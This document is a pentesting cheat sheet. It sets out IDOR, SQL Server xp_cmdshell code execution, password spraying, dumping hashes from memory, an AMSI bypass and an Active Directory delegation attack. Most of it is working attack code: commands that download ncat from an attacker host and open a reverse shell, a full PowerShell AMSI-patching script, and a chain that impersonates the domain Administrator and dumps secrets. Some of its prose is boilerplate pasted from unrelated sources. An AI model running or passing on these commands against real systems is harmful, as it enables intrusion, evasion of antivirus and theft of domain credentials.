Insecure direct object references (IDOR)

In this section, we will explain what insecure direct object references (IDOR) are and describe some common vulnerabilities. Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.

For example, an authentication link of the following form may be tampered to gain access to another object

http://url/auth/token/<base64-encoded>/session_id/

RCE via SQL Server

This article describes how to enable the xp_cmdshell SQL Server configuration option. This option allows system administrators to control whether the xp_cmdshell extended stored procedure can be executed on a system. By default, the xp_cmdshell option is disabled on new installations.

xp_cmdshell can be used to achieve RCE, however, sometime this function is not enabled. To enable the function:

EXECUTE AS LOGIN = 'SA';
EXEC sp_addsrvrolemember 'username', 'sysadmin';
sp_configure 'Show Advanced Options', 1
RECONFIGURE
sp_configure 'xp_cmdshell', 1
RECONFIGURE

• prepare reverse shell

# using ncat here to avoid AV detection
EXEC xp_cmdshell 'curl -s http://ip/ncat.exe -o c:\path\ncat.exe'
EXEC xp_cmdshell 'curl -s http://ip/libssl-3.dll -o c:\path\libssl-3.dll'
EXEC xp_cmdshell 'curl -s http://ip/libcrypto-3.dll -o c:\path\libcrypto-3.dll'
EXEC xp_cmdshell 'c:\path\ncat.exe ip 4444 -e cmd.exe'

SQL Server enum

• search for possible config files

dir /s *.INI

• password spray using crackmapexec

> crackmapexec smb target -u users.txt -p passwords.txt

• If there is a hit, run as the account: https://github.com/antonioCoco/RunasCs

.\RunasCs.exe username password cmd.exe -r ip:port

Memory dump analysis

In the event that your operating system crashes, you may be required to generate a complete memory dump to provide additional information to our technical support team. The dump file can then be used by developers to understand why the crash has occurred and help them in providing an accurate solution to the issue.

• To extract files from a memory dump: https://github.com/ufrisk/MemProcFS
• Dumping the hashes from extracted files

> impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local

AMSI bypass

Anti-Malware Scan Interface bypass is useful when there is a AV running. Below is an example bypass for Windows 11: https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6

function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
     Equals('System.dll')
     }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -like "Ge*P*oc*ddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))
}


function getDelegateType {
    Param (
     [Parameter(Position = 0, Mandatory = $True)] [Type[]]
     $func, [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
    DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
    DefineDynamicModule('InMemoryModule', $false).
    DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
    AutoClass', [System.MulticastDelegate])

  $type.
    DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
     SetImplementationFlags('Runtime, Managed')

  $type.
    DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType,
$func). SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

Resource-based Constrained Delegation

This is similar to constrained delegation, but instead of giving permissions to an object to impersonate any user against a service. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation#creating-a-computer-object

To exploit, need the following two tools

• https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
• https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Create new attacker machine

New-MachineAccount -MachineAccount newmachine -Password $(ConvertTo-SecureString 'password' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer newmachine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Get tgt

> impacket-getST -spn 'cifs/dc.target' -impersonate 'Administrator' 'domain/newmachine$:password' -dc-ip dc.target

Dump secrets

KRB5CCNAME=Administrator.ccache impacket-secretsdump domain/administrator@target -k -no-pass